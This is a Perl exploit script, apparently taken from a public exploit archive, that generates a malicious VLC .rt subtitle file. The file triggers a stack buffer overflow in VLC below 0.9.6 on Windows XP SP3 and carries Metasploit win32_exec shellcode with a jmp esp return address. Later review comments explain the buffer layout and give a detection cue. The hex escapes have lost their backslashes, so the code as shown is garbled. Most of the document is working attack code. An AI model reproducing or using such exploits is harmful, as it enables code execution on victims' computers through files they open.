# Title : VLC Media Player < 0.9.6 .RT Stack Buffer Overflow Exploit
# Published : 2008-11-07
# Author : SkD
#!/usr/bin/perl
# VLC Media Player < 0.9.6 .RT File Buffer Overflow (Stack Based)
# ---------------------------------------------------------------
# Exploit by SkD <skdrat@hotmail.com>
#
# This should work on a fully up-to-date Windows XP SP3. If you want it to work
# on your OS version, just find a "jmp esp" address in one of the dlls loaded
# with VLC :).
# Have fun. Remember that VLC will open the .rt file automatically alongside a video
# of the same name (example: s.mov with s.rt in the same folder).
# Credits to Tobias Klein.
# Author has no responsibility over the damage you do with this!
use strict; use warnings;
# Proof-of-concept generator: writes a single RealText (.rt) subtitle file,
# "s.rt", whose markup carries an over-long attribute value. Per the header,
# the target is VLC < 0.9.6 on Windows XP SP3; the addresses below are only
# valid for that build/OS combination.
#
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
# Payload as described by the generator line above (Metasploit win32_exec,
# alphanumeric-encoded). Nothing in this script decodes or validates it; it is
# copied into the file verbatim.
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x48x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41".
"x58x30x41x31x50x41x42x6bx41x41x51x41x32x41x41x32".
"x42x41x30x42x41x58x38x41x42x50x75x69x79x4bx4cx4d".
"x38x70x44x55x50x45x50x75x50x6ex6bx77x35x67x4cx6c".
"x4bx43x4cx45x55x74x38x55x51x58x6fx4ex6bx52x6fx45".
"x48x4ex6bx43x6fx65x70x76x61x58x6bx50x49x4ex6bx36".
"x54x4ex6bx75x51x4ax6ex56x51x6bx70x4cx59x6cx6cx6e".
"x64x59x50x70x74x63x37x69x51x78x4ax56x6dx45x51x5a".
"x62x78x6bx6cx34x67x4bx51x44x36x44x74x44x30x75x4d".
"x35x6cx4bx31x4fx31x34x65x51x5ax4bx52x46x4cx4bx74".
"x4cx62x6bx6cx4bx61x4fx77x6cx35x51x7ax4bx6cx4bx57".
"x6cx4cx4bx37x71x5ax4bx4cx49x73x6cx77x54x47x74x38".
"x43x50x31x6bx70x32x44x4ex6bx61x50x66x50x4fx75x6b".
"x70x51x68x44x4cx6cx4bx77x30x36x6cx6ex6bx70x70x77".
"x6cx6cx6dx6cx4bx50x68x73x38x6ax4bx74x49x6cx4bx4b".
"x30x4cx70x63x30x73x30x45x50x4ex6bx45x38x35x6cx53".
"x6fx35x61x4cx36x75x30x71x46x6dx59x4ax58x4bx33x4f".
"x30x31x6bx70x50x43x58x61x6ex6ex38x4bx52x32x53x31".
"x78x4cx58x4bx4ex4cx4ax46x6ex50x57x6bx4fx5ax47x50".
"x63x31x71x30x6cx35x33x44x6ex63x55x44x38x35x35x37".
"x70x41";
my $char = "x41";   # filler byte ('A') used before and after the payload
my $nop = "x90";    # NOP byte used for the short run in front of the shellcode
my $eip = "xd7x30x9dx7c"; # FOR WINDOWS XP SP3: 0x7c9d30d7 jmp esp (shell32.dll)
# $jmp and $addr are placed right after $eip; their role is not documented in
# this script (presumably a short relative jump and a fixed address -- verify
# against the original advisory before relying on this reading).
my $jmp = "xebx06xFFxFF";
my $addr = "xb5xb5xfdx7f";
# NOTE(review): two-argument open with the mode embedded in the string, and the
# result is never checked; a failed open here is silent and the print below
# then writes to an unopened handle.
open(my $rt, "> s.rt");
# The hex literals decode to RealText markup: a <window ...> header, a line of
# text, then `<time begin="` whose attribute value is the overflow buffer
# built on the three lines after the opening quote.
print $rt "x3Cx77x69x6Ex64x6Fx77x20x68x65".
"x69x67x68x74x3Dx22x32x35x30x22".
"x20x77x69x64x74x68x3Dx22x33x30".
"x30x22x20x64x75x72x61x74x69x6F".
"x6Ex3Dx22x31x35x22x20x62x67x63".
"x6Fx6Cx6Fx72x3Dx22x79x65x6Cx6C".
"x6Fx77x22x3Ex0Dx0Ax4Dx61x72x79".
"x20x68x61x64x20x61x20x6Cx69x74".
"x74x6Cx65x20x6Cx61x6Dx62x2Cx0D".
"x0Ax3Cx62x72x2Fx3Ex3Cx74x69x6D".
"x65x20x62x65x67x69x6Ex3Dx22".
# Buffer layout, in order: 72 filler bytes, the return-address overwrite
# ($eip), $jmp, $addr, a 12-byte NOP run, the shellcode, then 1024 more
# filler bytes of padding. From a defender's view the distinguishing feature
# of the file is simply a `begin` attribute value far longer than any valid
# timestamp.
$char x 72 . $eip . $jmp . $addr . $nop x 12 .
$shellcode . $char x 1024 .
# Closing quote of the attribute, then the rest of the (benign) RealText
# document so the file still looks structurally complete: further <time>
# elements, text lines and the </window> footer.
"x22x2Fx3Ex0Dx0Ax3Cx62x72x2Fx3E".
"x3Cx74x69x6Dx65x20x62x65x67x69".
"x6Ex3Dx22x36x22x2Fx3Ex6Cx69x74".
"x74x6Cx65x20x6Cx61x6Dx62x2Cx0D".
"x0Ax3Cx62x72x2Fx3Ex3Cx74x69x6D".
"x65x20x62x65x67x69x6Ex3Dx22x39".
"x22x2Fx3Ex4Dx61x72x79x20x68x61".
"x64x20x61x20x6Cx69x74x74x6Cx65".
"x20x6Cx61x6Dx62x0Dx0Ax3Cx62x72".
"x2Fx3Ex3Cx74x69x6Dx65x20x62x65".
"x67x69x6Ex3Dx22x31x32x22x2Fx3E".
"x77x68x6Fx73x65x20x66x6Cx65x65".
"x63x65x20x77x61x73x20x77x68x69".
"x74x65x20x61x73x20x73x6Ex6Fx77".
"x2Ex0Dx0Ax3Cx2Fx77x69x6Ex64x6F".
"x77x3Ex0Dx0A";
# The handle is never closed explicitly; the file is flushed only at interpreter exit.